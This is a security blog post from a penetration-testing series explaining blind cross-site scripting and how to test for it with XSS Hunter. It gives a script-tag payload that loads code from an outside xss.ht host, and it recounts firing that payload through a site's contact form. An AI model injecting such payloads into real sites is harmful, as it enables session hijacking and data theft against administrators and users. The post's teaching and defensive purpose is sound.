Blind Cross Site Scripting
Hello Friends!
This is my 31st blog on web application security penetration testing. In this blog I will explain about Blind Cross Site Scripting.
In my last blog, I have explained about DOM Based Cross Site Scripting. Hope everyone liked it. If you haven’t read it yet please follow along.
What is Blind XSS?
It is a type of stored XSS where attackers input is saved by server and is reflected in a totally different application used by system admin/team member.
How to Test for Blind XSS?
1. Sign up on XSS hunter. https://xsshunter.com/
2. Upon signing up you will create a special xss.ht short domain such as yoursubdomain.xss.ht which identifies your XSS vulnerabilities and hosts your payload.
3. You then use this subdomain in your XSS testing, using injection attempts such as "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter will automatically serve up XSS probes and collect the resulting information when they fire.
4. In my case it is “><script src=https://testmaddy.xss.ht></script> When you inject this script in any website xsshunter automatically will probe that website for all kind of xss and will send report on your xsshunter account.
5. Attack Vectors are, searchQueryParameter, DataStoredFields, Contact/feedback page, Chat Applications, EmailApplications, etc.
Blind XSS Testing Tools:
- XSS Hunter
2. KNOXSS
3. Burp Collaborator
4. bXSS
I am using XSS hunter for testing blind XSS, Below is the step by step POC:
To honor confidentiality let’s consider the domain name as redacted.com
- I have navigated to Contact US form and entered Blind XSS payload in the Name field and submitted the web form.
2. Navigate to the XSS hunter app and in the payload section you will have all the list of payload which can be used in the different context of the web page.
3. After submitting blind XSS payload in the Name field, After some days I have received email notification stating that XSS payload is fired on the web page along with details of the vulnerable domain where I have submitted payload.
payload used: “><script src=https://myusername.xss.ht></script>
4. I have immediately logged in to the XSS hunter application and same information which I have received via email was present in the “XSS fires” section.
I have tested it on so many application and received XSS fire notification many times.
Impact:
Many different attacks can be leveraged through the use of cross-site scripting, including:
Hijacking user’s active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.
Some Common Targets for Blind XSS:
Contact/Feedback pages
Log viewers
Exception handlers
Chat applications / forums
Customer ticket applications
Web Application Firewalls
Any application that requires user moderation
Customer service applications
Recommendation:
Like the offensive side, the defensive side is also very important in security.
So here are some defensive sides or prevention steps to save your web application from Blind XSS.The most common and effective way to accomplish this is by web developers who review the code and ensure that any user input is properly filtered.
You need a specialized tool that performs innocuous penetration testing, which apart from detecting the easy to detect XSS vulnerabilities.
If your website is implemented using the latest technology such as HTML 5 or you ensure that your web server is fully patched, the web application may still be vulnerable to XSS.
It is good coding practice to never trust data provided by the user.
References:
1. POC Reference: https://hackerone.com/reports/275518
2. Other References: https://hackerone.com/reports/314126 https://mhmdiaa.github.io/blind-xss-in-spotify/
3. Best Resource: https://brutelogic.com.br/blog/blind-xss-code/
I hope everyone like it and if you people face any difficulty please do let me know via comment.
Please do like and follow for more reads!
Thanks!
